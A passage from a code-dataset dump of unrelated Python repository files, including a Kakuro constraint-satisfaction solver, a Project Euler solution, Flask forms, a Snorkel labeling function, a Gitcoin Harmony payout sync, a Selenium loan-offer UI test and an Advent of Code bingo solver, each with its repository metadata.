1\n\n if check_node:\n return False\n else:\n return True\n\n def set_copy_of_domain_each_node(self):\n for node in self.arrOfValueNodes:\n node.set_copy_of_domain()\n\n def set_copy_of_value_nodes(self):\n self.copyOfArrOfValueNodes = self.arrOfValueNodes.copy()\n\n @staticmethod\n def add_none_value_nodes(first_arr, second_arr):\n for x in first_arr:\n if x.value is None:\n if x not in second_arr:\n second_arr.append(x)\n elif x.value is not None:\n if x in second_arr:\n second_arr.remove(x)\n\n # use queue in this search that act like MRV and degree heuristic\n def backtrack_search_use_queue(self):\n Kakuro.add_none_value_nodes(self.arrOfValueNodes, self.copyOfArrOfValueNodes)\n heapq.heapify(self.copyOfArrOfValueNodes)\n if len(self.copyOfArrOfValueNodes) > 0 and not Kakuro.check_goal(self.row, self.col, self.board):\n node = heapq.heappop(self.copyOfArrOfValueNodes)\n Kakuro.least_constraining_value(node)\n if node.value is None:\n i = 0\n # chang it to while loop because for is not work good\n while i < len(node.copyOfDomain):\n node.value = node.copyOfDomain[i]\n node.copyOfDomain.remove(node.value)\n # print(Kakuro.print_board_value(self.row, self.col, self.board))\n print(f\"{node}: {node.value}-----> {node.copyOfDomain}\")\n if Kakuro.valid_value(node):\n if Kakuro.forward_checking(node):\n Kakuro.add_none_value_nodes(self.arrOfValueNodes, self.copyOfArrOfValueNodes)\n heapq.heapify(self.copyOfArrOfValueNodes)\n if self.backtrack_search_use_queue():\n return True\n\n Kakuro.rec_forward_checking(node)\n node.copyOfDomain.append(node.value)\n node.copyOfDomain.sort()\n node.copyOfDomain = list(dict.fromkeys(node.copyOfDomain))\n # print (f\"{node}----------->copy of domain before lcv{node.copyOfDomain}\")\n Kakuro.least_constraining_value(node)\n node.value = None\n # print(Kakuro.print_board_value(self.row, self.col, self.board))\n i += 1\n # ------------------------------------------------------------------------------------------------------\n # change this code to while loop\n # for domain in node.copyOfDomain:\n # node.value = domain\n # node.copyOfDomain.remove(node.value)\n # print(Kakuro.print_board_value(self.row, self.col, self.board))\n # print(f\"{node}: {node.value}-----> {node.copyOfDomain}\")\n # if Kakuro.valid_value(node):\n # if Kakuro.forward_checking(node):\n # Kakuro.add_none_value_nodes(self.arrOfValueNodes, self.copyOfArrOfValueNodes)\n # heapq.heapify(self.copyOfArrOfValueNodes)\n # if self.backtrack_search_use_queue():\n # return True\n #\n # Kakuro.rec_forward_checking(node)\n # node.copyOfDomain.append(node.value)\n # node.copyOfDomain.sort()\n # node.copyOfDomain = list(dict.fromkeys(node.copyOfDomain))\n # # print (f\"{node}----------->copy of domain before lcv{node.copyOfDomain}\")\n # Kakuro.least_constraining_value(node)\n # node.value = None\n # print(Kakuro.print_board_value(self.row, self.col, self.board))\n # ------------------------------------------------------------------------------------------------------\n\n else:\n print(\"*\" * 64 + '\\n')\n print(Kakuro.print_board_value(self.row, self.col, self.board))\n print(\"*\" * 64)\n exit()\n\n def backtrack_search(self, number_in_arr_of_value):\n # we use not check_goal because we need it to be true when it is false.\n if number_in_arr_of_value < len(self.arrOfValueNodes) and not Kakuro.check_goal(self.row, self.col, self.board):\n node = self.arrOfValueNodes[number_in_arr_of_value]\n if node.value is None:\n for domain in self.lcv(node):\n node.value = domain\n # node.copyOfDomain.remove(node.value)\n print(f\"{node}: {node.value}-----> {node.copyOfDomain}\")\n # print(Kakuro.print_board_value(self.row, self.col, self.board))\n if Kakuro.valid_value(node):\n if Kakuro.forward_checking(node):\n if self.backtrack_search(number_in_arr_of_value + 1):\n return True\n self.rec_forward_checking(node)\n\n\n\n # Kakuro.rec_forward_checking(node)\n # node.copyOfDomain.append(node.value)\n # node.copyOfDomain = list(dict.fromkeys(node.copyOfDomain))\n # node.copyOfDomain.sort()\n node.value = None\n else:\n print(\"*\" * 64 + '\\n')\n print(Kakuro.print_board_value(self.row, self.col, self.board))\n print(\"*\" * 64)\n exit()\n\n @staticmethod\n def forward_checking(node):\n for x in node.verticalNeighbors:\n if node.value in x.copyOfDomain:\n x.copyOfDomain.remove(node.value)\n if len(x.copyOfDomain) <= 0 and x.value is None:\n return False\n for x in node.horizontalNeighbors:\n if node.value in x.copyOfDomain:\n x.copyOfDomain.remove(node.value)\n if len(x.copyOfDomain) <= 0 and x.value is None:\n return False\n return True\n\n @staticmethod\n def rec_forward_checking(node):\n for x in node.verticalNeighbors:\n if node.value in x.domain:\n x.copyOfDomain.append(node.value)\n x.copyOfDomain = list(dict.fromkeys(x.copyOfDomain))\n x.copyOfDomain.sort()\n for x in node.horizontalNeighbors:\n if node.value in x.domain:\n x.copyOfDomain.append(node.value)\n x.copyOfDomain = list(dict.fromkeys(x.copyOfDomain))\n x.copyOfDomain.sort()\n\n @staticmethod\n def valid_value(node):\n sum_vertical = node.value\n sum_horizontal = node.value\n count_h = 0\n count_v = 0\n for x in node.verticalNeighbors:\n if x.value is not None:\n if x.value == node.value:\n return False\n count_v += 1\n sum_vertical += x.value\n for x in node.horizontalNeighbors:\n if x.value is not None:\n if x.value == node.value:\n return False\n count_h += 1\n sum_horizontal += x.value\n\n if sum_horizontal > node.rowC:\n return False\n elif sum_vertical > node.colC:\n return False\n elif count_v == len(node.verticalNeighbors) and sum_vertical != node.colC:\n return False\n elif count_h == len(node.horizontalNeighbors) and sum_horizontal != node.rowC:\n return False\n else:\n return True\n\n @staticmethod\n def print_board_value(row, col, board):\n text = \"\"\n for i in range(0, row):\n for j in range(0, col):\n # because B nodes has no number in their name\n if board[i][j].value is None and board[i][j].type == 'value':\n text += '0 '\n elif board[i][j].type == 'constraint':\n if board[i][j].rowC is not None:\n text += str(board[i][j].rowC) + \" \"\n elif board[i][j].colC is not None:\n text += str(board[i][j].colC) + \" \"\n elif board[i][j].type == 'blank':\n text += '-1 '\n\n else:\n text += str(board[i][j].value) + \" \"\n text += '\\n'\n return text\n\n @staticmethod\n # LCV heuristic\n def least_constraining_value(node):\n arr = node.copyOfDomain\n neighbors = node.verticalNeighbors.copy()\n neighbors += node.horizontalNeighbors.copy()\n new_arr = []\n count_of_each_domain = {}\n\n for n in arr:\n counter = 0\n for neighbor in neighbors:\n if n in neighbor.domain:\n counter += 1\n count_of_each_domain[n] = counter\n # print(f'{node}--------------------------------------------->new arr{count_of_each_domain}')\n result = sorted(count_of_each_domain, key=count_of_each_domain.get)\n if len(result) != len(arr): # TODO check and put the domain that doesn't in neighbours\n print('---------------------------=========error=======================-----------------------------------')\n\n # for n in arr:\n # for neighbor in neighbors:\n # if n not in neighbor.domain and n not in new_arr:\n # new_arr.append(n)\n # for n in arr:\n # if n not in new_arr:\n # new_arr.append(n)\n #\n\n # print(f'{node}--------------------------------------------->new arr{result}')\n node.copyOfDomain = result\n\n @staticmethod\n # MRV heuristic (NOT USE)\n def minimum_remaining_values(arr_of_nodes):\n heapq.heapify(arr_of_nodes)\n # arr_of_nodes.sort(key=lambda x: len(x.domain))\n # print(arr_of_nodes)\n\n def arc_consistency(self):\n queue = {(node, node2) for node in self.arrOfValueNodes for node2 in node.horizontalNeighbors}\n temp_queue = {(node, node2) for node in self.arrOfValueNodes for node2 in node.verticalNeighbors}\n queue.update(temp_queue)\n # for node in self.arrOfValueNodes:\n # for neighbour in node.horizontalNeighbors:\n # temp = (node, neighbour)\n # queue.add(tuple(temp))\n # for neighbour in node.verticalNeighbors:\n # temp = (node, neighbour)\n # queue.add(tuple(temp))\n while len(queue) != 0:\n node1, node2 = queue.pop()\n if Kakuro.remove_in_consistent_values(self.board, node1, node2):\n if len(node1.copyOfDomain) == 0:\n return False\n for neighbour in node1.horizontalNeighbors:\n if neighbour.name != node2.name:\n queue.add((neighbour, node1))\n return True\n\n @staticmethod\n def remove_in_consistent_values(board, first_node, second_node):\n remove = False\n for domain in first_node.copyOfDomain:\n check = True\n for domain2 in second_node.copyOfDomain:\n if Kakuro.check_conflict(board, first_node, domain, second_node, domain2):\n check = False\n if not check:\n break\n if check:\n first_node.copyOfDomain.rmove(domain)\n remove = True\n return remove\n\n @staticmethod\n def check_conflict(board, node1, domain1, node2, domain2):\n sum_consistency = -1\n if domain2 == domain1:\n return False\n if node1.rowIndex == node2.rowIndex:\n row = board[node1.rowIndex]\n sum_consistency = -1\n for node in row:\n if node.type == 'C':\n sum_consistency = node.rowC\n break\n elif node1.colIndex == node2.colIndex:\n list_of_col_nodes = []\n for row in board:\n list_of_col_nodes.append(row[node1.colIndex])\n sum_consistency = -1\n for node in list_of_col_nodes:\n if node.type == 'C':\n sum_consistency = node.rowC\n break\n if sum_consistency == -1:\n return True\n if sum_consistency < (domain1 + domain2):\n return True\n else:\n return False\n\n def lcv(self, node):\n domain_conflict = []\n for domain in node.copyOfDomain:\n sum = 0\n for neighbor in node.horizontalNeighbors:\n if domain in neighbor.copyOfDomain:\n sum += 1\n for neighbor in node.verticalNeighbors:\n if domain in neighbor.copyOfDomain:\n sum += 1\n domain_conflict.append((domain, sum))\n domain_conflict.sort(key=lambda dc: dc[1])\n return node.copyOfDomain","repo_name":"pouriyabp/kakuro-CSP-solver","sub_path":"Kakuro.py","file_name":"Kakuro.py","file_ext":"py","file_size_in_byte":20423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"14753846517","text":"#######################################################################################################################################\n# Project Euler Problem 30 Solution -- Digit Fifth Powers\n# By Mike Kane\n#\n#\n#Surprisingly there are only three numbers that can be written as the sum of fourth powers of their digits:\n#\n#1634 = 14 + 64 + 34 + 44\n#8208 = 84 + 24 + 04 + 84\n#9474 = 94 + 44 + 74 + 44\n#As 1 = 14 is not a sum it is not included.\n#\n#The sum of these numbers is 1634 + 8208 + 9474 = 19316.\n#\n#Find the sum of all the numbers that can be written as the sum of fifth powers of their digits.\n#\n#######################################################################################################################################\n\ndef checkSum(number):\n answer = 0\n strNumber = str(number)\n for char in strNumber:\n answer += int(char)**5\n if answer == number:\n return True\n else:\n return False\n\ndef getAnswer():\n totalSum = 0\n for x in range(2, 355000):\n if checkSum(x) == True:\n totalSum += x\n return totalSum","repo_name":"richglezriv/rdlms","sub_path":"euler_solution_30.py","file_name":"euler_solution_30.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"860887066","text":"#!/usr/bin/env python\n# coding: utf-8\n\n__author__ = 'yueyt'\n\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField, BooleanField, SelectField, TextAreaField, PasswordField, \\\n SelectMultipleField\nfrom wtforms import ValidationError\nfrom wtforms.validators import ip_address\n\nfrom webapp.models.server import Envinfo, Server\nfrom webapp.models.user import Subproject\n\nMACHINE_TYPE_LIST = [\n ('SUSE SLES11 SP2', 'SUSE SLES11 SP2'),\n ('SUSE SLES11 SP3', 'SUSE SLES11 SP3'),\n ('SUSE SLES11 SP4', 'SUSE SLES11 SP4'),\n ('AIX 7100', 'AIX 7100'),\n ('AIX 5100', 'AIX 5100'),\n ('AIX 6100', 'AIX 6100')\n]\n\n\nclass ServerForm(FlaskForm):\n ip = StringField('ip:', validators=[ip_address()], render_kw={'placeholder': 'ip: XXX.XXX.XXX.XXX'})\n subproject_id = SelectMultipleField('所属项目:', coerce=int)\n oslevel = SelectField('操作系统版本:')\n use = TextAreaField('用途:', render_kw={'placeholder': '填写该机器主要做什么用?MB应用/MQ网关。。。'})\n owner = StringField('联系人:', render_kw={'placeholder': '填写机器的申请人'})\n envinfo_id = SelectField('环境:', coerce=int)\n status = BooleanField('使用中', default=True)\n submit = SubmitField('保存')\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.subproject_id.choices = [(a.id, ' '.join([a.name, a.name_en])) for a in Subproject.query.order_by('id')]\n self.oslevel.choices = MACHINE_TYPE_LIST\n self.oslevel.coerce = str\n self.envinfo_id.choices = [(a.id, ' '.join([a.location, a.envname])) for a in Envinfo.query.order_by('id')]\n\n def validate_ip(self, field):\n if Server.query.filter_by(ip=field.data).first():\n raise ValidationError('该ip已经登记过!')\n\n\nclass EditServerForm(FlaskForm):\n ip = StringField('ip:', render_kw={'readonly': 'readonly'})\n subproject_id = SelectMultipleField('所属项目:', coerce=int)\n oslevel = SelectField('操作系统版本:')\n use = TextAreaField('用途:', render_kw={'placeholder': '填写该机器主要做什么用?MB应用/MQ网关。。。'})\n owner = StringField('联系人:', render_kw={'placeholder': '填写机器的申请人'})\n envinfo_id = SelectField('环境:', coerce=int)\n status = BooleanField('使用中', default=True)\n submit = SubmitField('保存')\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.subproject_id.choices = [(a.id, ' '.join([a.name, a.name_en])) for a in Subproject.query.order_by('id')]\n self.oslevel.choices = MACHINE_TYPE_LIST\n self.oslevel.coerce = str\n self.envinfo_id.choices = [(a.id, ' '.join([a.location, a.envname])) for a in Envinfo.query.order_by('id')]\n\n\nclass ServerUserForm(FlaskForm):\n username = StringField('用户名')\n password = PasswordField('密码')\n submit_add = SubmitField('保存密码')\n submit_delete = SubmitField('删除密码')\n","repo_name":"yyt030/servermanager","sub_path":"webapp/forms/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"39607068714","text":"import sys\nimport time\nimport socket\nfrom device import Device\n\nfrom bmap import bmap\n\nfrom kivy.app import App\nfrom kivy.lang import Builder\nfrom kivy.uix.togglebutton import ToggleButton\nfrom kivy.uix.boxlayout import BoxLayout\n\nclass RootWidget(BoxLayout):\n pass\n\nclass BoozeConnect(App):\n\n\n def setANR(self, widget):\n if widget.state == 'down':\n print(f'setting mode {widget.text}')\n self.bmap.settings.ANR.set(widget.text)\n self.root.ids['ANRMode'].text = widget.text\n\n def build(self):\n # Connect to device and load bmap classes\n self.dev = Device(sys.argv[1])\n self.bmap = bmap(self.dev.read, self.dev.write)\n self.dev.connect()\n\n # Load UI\n Builder.load_file('ui.kv')\n self.root = RootWidget()\n\n # Get ANR\n self.parsed = self.bmap.settings.ANR.get()\n self.root.ids['ANRMode'].text = self.parsed['anr_mode'].name\n for mode in self.parsed['supported_modes']:\n modebtn = ToggleButton(text=mode.name, group='ANRMode', on_press=self.setANR)\n self.root.ids['ANRModes'].add_widget(modebtn)\n\n return self.root\n\nBoozeConnect().run()\n","repo_name":"prototux/booze-connect","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"22661330169","text":"from snorkel.preprocess.nlp import SpacyPreprocessor\nfrom snorkel.preprocess.spark import make_spark_preprocessor\n\nfrom .nlp import (\n BaseNLPLabelingFunction,\n SpacyPreprocessorParameters,\n base_nlp_labeling_function,\n)\n\n\nclass SparkNLPLabelingFunction(BaseNLPLabelingFunction):\n r\"\"\"Special labeling function type for SpaCy-based LFs running on Spark.\n\n This class is a Spark-compatible version of ``NLPLabelingFunction``.\n See ``NLPLabelingFunction`` for details.\n\n Parameters\n ----------\n name\n Name of the LF\n f\n Function that implements the core LF logic\n resources\n Labeling resources passed in to ``f`` via ``kwargs``\n pre\n Preprocessors to run before SpacyPreprocessor is executed\n text_field\n Name of data point text field to input\n doc_field\n Name of data point field to output parsed document to\n language\n SpaCy model to load\n See https://spacy.io/usage/models#usage\n disable\n List of pipeline components to disable\n See https://spacy.io/usage/processing-pipelines#disabling\n memoize\n Memoize preprocessor outputs?\n memoize_key\n Hashing function to handle the memoization (default to snorkel.map.core.get_hashable)\n gpu\n Prefer Spacy GPU processing?\n\n Raises\n ------\n ValueError\n Calling incorrectly defined preprocessors\n\n Attributes\n ----------\n name\n See above\n \"\"\"\n\n @classmethod\n def _create_preprocessor(\n cls, parameters: SpacyPreprocessorParameters\n ) -> SpacyPreprocessor:\n preprocessor = SpacyPreprocessor(**parameters._asdict())\n make_spark_preprocessor(preprocessor)\n return preprocessor\n\n\nclass spark_nlp_labeling_function(base_nlp_labeling_function):\n \"\"\"Decorator to define a SparkNLPLabelingFunction object from a function.\n\n Parameters\n ----------\n name\n Name of the LF\n resources\n Labeling resources passed in to ``f`` via ``kwargs``\n pre\n Preprocessors to run before SpacyPreprocessor is executed\n text_field\n Name of data point text field to input\n doc_field\n Name of data point field to output parsed document to\n language\n SpaCy model to load\n See https://spacy.io/usage/models#usage\n disable\n List of pipeline components to disable\n See https://spacy.io/usage/processing-pipelines#disabling\n memoize\n Memoize preprocessor outputs?\n memoize_key\n Hashing function to handle the memoization (default to snorkel.map.core.get_hashable)\n\n Example\n -------\n >>> @spark_nlp_labeling_function()\n ... def has_person_mention(x):\n ... person_ents = [ent for ent in x.doc.ents if ent.label_ == \"PERSON\"]\n ... return 0 if len(person_ents) > 0 else -1\n >>> has_person_mention\n SparkNLPLabelingFunction has_person_mention, Preprocessors: [SpacyPreprocessor...]\n\n >>> from pyspark.sql import Row\n >>> x = Row(text=\"The movie was good.\")\n >>> has_person_mention(x)\n -1\n \"\"\"\n\n _lf_cls = SparkNLPLabelingFunction\n","repo_name":"snorkel-team/snorkel","sub_path":"snorkel/labeling/lf/nlp_spark.py","file_name":"nlp_spark.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","stars":5598,"dataset":"github-code","pt":"38"} +{"seq_id":"6716904085","text":"import json\n\nfrom django.conf import settings\nfrom django.utils import timezone\n\nimport requests\nfrom dashboard.sync.helpers import record_payout_activity, txn_already_used\n\n\ndef find_txn_on_harmony_explorer(fulfillment):\n token_name = fulfillment.token_name\n\n funderAddress = fulfillment.bounty.bounty_owner_address\n amount = fulfillment.payout_amount\n payeeAddress = fulfillment.fulfiller_address\n\n if token_name != 'ONE':\n return None\n\n\n url = f'https://explorer.hmny.io:8888/address?id={payeeAddress}&pageIndex=0&pageSize=20'\n\n\n response = requests.get(url).json()\n if (\n response and\n 'address' in response and\n 'shardData' in response['address']\n ):\n for shard in response['address']['shardData']:\n\n for tx in shard['txs']:\n if (\n tx['from'] == funderAddress.lower() and\n tx['to'] == payeeAddress.lower() and\n tx['value'] == float(amount) * 10 ** 18 and\n not txn_already_used(tx['hash'], token_name)\n ):\n return tx\n return None\n\n\ndef get_harmony_txn_status(fulfillment):\n\n txnid = fulfillment.payout_tx_id\n token_name = fulfillment.token_name\n funderAddress = fulfillment.funder_address\n amount = fulfillment.payout_amount\n payeeAddress = fulfillment.fulfiller_address\n\n if token_name != 'ONE':\n return None\n\n if not txnid or txnid == \"0x0\":\n return None\n\n url = f'https://explorer.hmny.io:8888/tx?id={txnid}'\n\n\n response = requests.get(url).json()\n if (response and 'tx' in response):\n tx = response['tx']\n\n if 'err' in tx:\n # txn hasn't been published to chain yet\n return None\n\n if (\n tx['from'] == funderAddress.lower() and\n tx['to'] == payeeAddress.lower() and\n tx['value']== float(amount) * 10 ** 18 and\n not txn_already_used(tx['hash'], token_name)\n ):\n if tx['status'] == 'SUCCESS':\n return 'success'\n\n return None\n\n\ndef sync_harmony_payout(fulfillment):\n if not fulfillment.payout_tx_id or fulfillment.payout_tx_id == \"0x0\":\n txn = find_txn_on_harmony_explorer(fulfillment)\n if txn:\n fulfillment.payout_tx_id = txn['hash']\n fulfillment.save()\n\n if fulfillment.payout_tx_id and fulfillment.payout_tx_id != \"0x0\":\n txn_status = get_harmony_txn_status(fulfillment)\n\n if txn_status == 'success':\n fulfillment.payout_status = 'done'\n fulfillment.accepted_on = timezone.now()\n fulfillment.accepted = True\n record_payout_activity(fulfillment)\n\n elif txn_status == 'expired':\n fulfillment.payout_status = 'expired'\n\n fulfillment.save()\n","repo_name":"gitcoinco/web","sub_path":"app/dashboard/sync/harmony.py","file_name":"harmony.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","stars":1747,"dataset":"github-code","pt":"38"} +{"seq_id":"40595468770","text":"# Testcase: Verify via the UI that as a borrower - you are seeing loan offers, upon filling the required form fields with valid inputs.\n# Input URL: https://www.credify.tech/phone/nonDMFunnel\n# Input URL: https://www.credify.tech/portal/login\n\nimport pytest\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\n\n# driver= webdriver.Firefox(executable_path=\"C:\\\\Users\\\\mbehera\\\\Desktop\\\\PROJECTS\\\\Automation\\\\Browser\\\\geckodriver.exe\")\n\ndriver = webdriver.Chrome(ChromeDriverManager().install())\nurl = \"https://www.credify.tech/phone/nonDMFunnel\"\nportalurl = \"https://www.credify.tech/portal/login\"\n\nclass TestLoanOffer():\n\n def test_VerifyLoanOffer(self):\n\n #Step1: Navigate to https://www.credify.tech/phone/nonDMFunnel\n driver.get(url)\n driver.maximize_window()\n\n #Step2: a. Enter loan amount as 2,000 and select any purpose\n #b. Click \"Check your Rate\"\n element_LoanAmount= driver.find_element_by_name(\"desiredAmount\")\n element_LoanAmount.click()\n element_LoanAmount.send_keys(2000)\n element_LoanPurpose = driver.find_element_by_css_selector(\"#root > div > main > div > div > div > div > div.col-xs-12.col-md-5 > div.section--sm.row > form > div > div > div:nth-child(2) > div > select\")\n element_LoanPurpose.send_keys('d') # for 'Debt Consolidation'\n element_button= driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/div/div/div/div[2]/div[2]/form/div/div/div[3]/button\")\n element_button.submit()\n\n #Step3: Enter basic info in the page.\n firstname= driver.find_element_by_name(\"borrowerFirstName\")\n firstname.send_keys(\"Tom\")\n lastname = driver.find_element_by_name(\"borrowerLastName\")\n lastname.send_keys(\"sandy\")\n address = driver.find_element_by_name(\"borrowerStreet\")\n address.send_keys(\"1111 Grundy lane, San Bruno, CA, USA\")\n city= driver.find_element_by_name(\"borrowerCity\")\n city.send_keys(\"San Bruno\")\n state = driver.find_element_by_name(\"borrowerState\")\n state.send_keys(\"California\")\n zipcode = driver.find_element_by_name(\"borrowerZipCode\")\n zipcode.send_keys(94010)\n DOB = driver.find_element_by_name(\"borrowerDateOfBirth\")\n DOB.send_keys(\"01/01/1985\")\n button_continue = driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/div[1]/div[2]/div[1]/div/div/form/div[2]/button\")\n button_continue.submit()\n income=driver.find_element_by_name(\"borrowerIncome\")\n income.send_keys(125000)\n additionaliIncome = driver.find_element_by_name(\"borrowerAdditionalIncome\")\n additionaliIncome.send_keys(6000)\n button_continue2 = driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/div[1]/div[2]/div[1]/div/div/form/div[2]/button\")\n button_continue2.submit()\n email= driver.find_element_by_name(\"username\")\n email.send_keys(\"hello123@upgrade-challnge.com\")\n pw= driver.find_element_by_name(\"password\")\n pw.send_keys(\"Hello@123\")\n checkbox= driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/div[1]/div[2]/div[1]/div/div/form/div[2]/div/label/div[1]\")\n checkbox.click()\n checkRate_button= driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/div[1]/div[2]/div[1]/div/div/form/div[2]/div/label/div[1]\")\n checkRate_button.submit()\n\n #Step4: From the /offer-page, store the Loan Amount, Monthly Payment, Term, Interest Rate and APR from the default offer on top of the page.\n #a. Click on \"Sign Out\" from the Menu option in the top right corner\n driver.implicitly_wait(5)\n LoanAmount = driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/div[2]/div[1]/div/div[1]/div[1]/div[1]/div[2]/span[2]\")\n MonthlyPayment = driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/div[2]/div[1]/div/div[1]/div[1]/div[3]/div/div/div/div[1]/div/div/span\").text\n Term = driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/div[2]/div[1]/div/div[1]/div[1]/div[3]/div/div/div/div[2]/div/div/div[1]\").text\n InterestRate = driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/div[2]/div[1]/div/div[1]/div[1]/div[3]/div/div/div/div[2]/div/div/div[2]\").text\n APR = driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/div[2]/div[1]/div/div[1]/div[1]/div[3]/div/div/div/div[2]/div/div/div[3]/div[1]\").text\n LoanAmountfinal = LoanAmount.text\n print(LoanAmountfinal)\n print(MonthlyPayment)\n print(Term)\n print(InterestRate)\n print(APR)\n menu = driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/header/div/label\")\n menu.click()\n signout = driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/header/div/nav/ul/li[2]/a\")\n signout.click()\n #driver.close()\n\n #Step5: Now navigate to https://www.credify.tech/portal/login\n # a. Enter the previously entered email and password\n # b. Click \"Sign In to your account\"\n driver.get(portalurl)\n portal_login = driver.find_element_by_name(\"username\")\n portal_login.send_keys(\"hello123@upgrade-challnge.com\")\n portal_pw = driver.find_element_by_name(\"password\")\n portal_pw.send_keys(\"Hello@123\")\n signIn = driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/div/div/div/div/form/button\")\n signIn.submit()\n driver.implicitly_wait(5)\n\n #Step6: Make sure you are on /offer-page\n # a. Validate that Loan Amount, APR, Loan Term and Monthly Payment matches with the info stored\n # previously\n header = driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/div[1]/div/h2\")\n pageHeader = header.text\n amount= driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/div[2]/div[1]/div/div[1]/div[1]/div[1]/div[2]/span[2]\").text\n offeredmonthypayment = driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/div[2]/div[1]/div/div[1]/div[1]/div[3]/div/div/div/div[1]/div/div/span\").text\n offered_term = driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/div[2]/div[1]/div/div[1]/div[1]/div[3]/div/div/div/div[2]/div/div/div[1]\").text\n offered_InterestRate = driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/div[2]/div[1]/div/div[1]/div[1]/div[3]/div/div/div/div[2]/div/div/div[2]\").text\n offered_APR = driver.find_element_by_xpath(\"//*[@id='root']/div/main/div/div[2]/div[1]/div/div[1]/div[1]/div[3]/div/div/div/div[2]/div/div/div[3]/div\").text\n if pageHeader == \"You qualify for a discount on your debt payoff loan!\":\n assert amount == LoanAmountfinal\n print(\"The Loan amount matches and it is \" + str(LoanAmountfinal))\n assert offeredmonthypayment == MonthlyPayment\n print(\"Monthy payment matches and its\" + str(MonthlyPayment))\n assert offered_term == Term\n print(\"Term matches and its\" + Term)\n assert offered_InterestRate == InterestRate\n print(\"Interest Rate matches and its\" + InterestRate)\n assert offered_APR == APR\n print(\"APR matches and its\" + APR)\n else:\n print(\"You are not on the offer-page, please check\")\n\n\n\n# a = TestLoanOffer()\n# a.test_VerifyLoanOffer()\n\n\n\n\n\n\n","repo_name":"muktabehera/Selenium_WebAutomation","sub_path":"Tests/test_LoanOffers.py","file_name":"test_LoanOffers.py","file_ext":"py","file_size_in_byte":7348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"25438922014","text":"INPUT_FILE = \"input\"\n\nfrom more_itertools import chunked\n\nimport numpy as np\n\n\ndef get_input():\n with open(INPUT_FILE) as f:\n calls = [int(x) for x in f.readline().strip().split(\",\")]\n\n remaining_lines = [\n [int(x) for x in line.strip().split()]\n for line in f.readlines()\n if line != \"\\n\"\n ]\n\n boards = list(chunked(remaining_lines, 5))\n\n return calls, boards\n\n\ndef update_board(board, num):\n for (y, row) in enumerate(board):\n for (x, column) in enumerate(row):\n if column == num:\n board[y][x] = \"X\"\n return board\n\n return board\n\n\ndef board_wins(board):\n def board_has_full_row(b):\n for row in b:\n if len([x for x in row if x != \"X\"]) == 0:\n return True\n\n # Check horizontal\n if board_has_full_row(board):\n return True\n\n # Check vertical\n if board_has_full_row(np.transpose(board)):\n return True\n\n return False\n\n\ndef get_score(board):\n return sum(x for row in board for x in row if x != \"X\")\n\n\ndef pt_one():\n call_order, boards = get_input()\n\n for n in call_order:\n for (i, board) in enumerate(boards):\n boards[i] = update_board(board, n)\n\n if board_wins(board):\n return get_score(board) * n\n\n\ndef pt_two():\n call_order, boards = get_input()\n marked_boards = [[False, board] for board in boards]\n\n for n in call_order:\n for (i, board) in enumerate(marked_boards):\n if board[0]:\n continue\n\n marked_boards[i][1] = update_board(board[1], n)\n\n if board_wins(board[1]):\n board[0] = True\n\n # If all boards have won, this is the last board\n if len([b for b in marked_boards if not b[0]]) == 0:\n return get_score(board[1]) * n\n\n\nif __name__ == \"__main__\":\n print(pt_one())\n print(pt_two())\n","repo_name":"advmtue/advent-of-code","sub_path":"2021/4/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"241891167","text":"import sys\nimport itertools\nfrom queue import Queue\nfrom threading import Thread\nimport pdb\nimport random\n\ndef _calc_opcode_args(opcode, numbers, i, relative_base):\n modes = list()\n args = list()\n newOpcode = opcode % 100\n modes.append(int(int((opcode % 1000)) / 100))\n modes.append(int(int((opcode % 10000)) / 1000))\n modes.append(int(int((opcode % 100000)) / 10000))\n opcode = newOpcode\n\n j = 1\n for mode in modes:\n if mode == 1:\n args.append(i + j)\n elif mode == 0:\n args.append(numbers[i + j])\n else:\n args.append(relative_base + numbers[i + j])\n j += 1\n return (opcode, args)\n\n\ndef run_computer(numbers, in_queue, out_queue, num):\n i = 0\n relative_base = 0\n while i < len(numbers):\n opcode, args = _calc_opcode_args(numbers[i], numbers, i, relative_base)\n def number1():\n return args[0]\n def number2():\n return args[1]\n def number3():\n return args[2]\n\n if opcode == 99:\n break\n if opcode == 1 or opcode == 2:\n if (opcode == 1):\n numbers[number3()] = numbers[number1()] + numbers[number2()]\n else:\n numbers[number3()] = numbers[number1()] * numbers[number2()]\n i += 4\n if opcode == 3:\n inputValue = in_queue.get()\n if inputValue == 99999:\n break\n 